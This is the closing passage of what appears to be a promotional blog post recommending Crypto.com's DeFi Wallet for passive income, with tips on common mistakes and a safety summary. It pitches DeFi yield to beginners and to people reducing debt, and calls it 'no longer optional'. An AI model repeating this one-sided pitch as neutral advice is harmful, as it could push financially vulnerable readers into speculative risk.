Common Mistakes to Avoid
Ignoring smart contract risk
Falling for fake APY promises
Storing seed phrases digitally
Over-allocating to one protocol
Forgetting about gas fees
Avoiding these mistakes alone can dramatically improve long-term returns.
Is Crypto.com DeFi Wallet Safe?
Security depends largely on user behavior.
Safety Strengths:
Non-custodial
Transparent smart contracts
Established ecosystem
Regular updates
Your biggest risk isn’t the wallet — it’s poor operational security.
Who Should Use Crypto.com’s DeFi Wallet?
This wallet is ideal for:
Passive income seekers
Crypto beginners entering DeFi
Long-term CRO holders
Investors diversifying away from banks
Individuals rebuilding finances or reducing debt through alternative income
Final Thoughts: Is Crypto.com DeFi Wallet Worth It for Passive Income?
If you’re serious about earning passive income with crypto, Crypto.com’s DeFi Wallet offers a balanced entry point into decentralized finance.
It combines:
Self-custody
Real yield opportunities
Beginner-friendly design
Access to advanced DeFi strategies
In a financial system increasingly defined by inflation, debt, and centralized control, learning how to generate decentralized income is no longer optional — it’s strategic.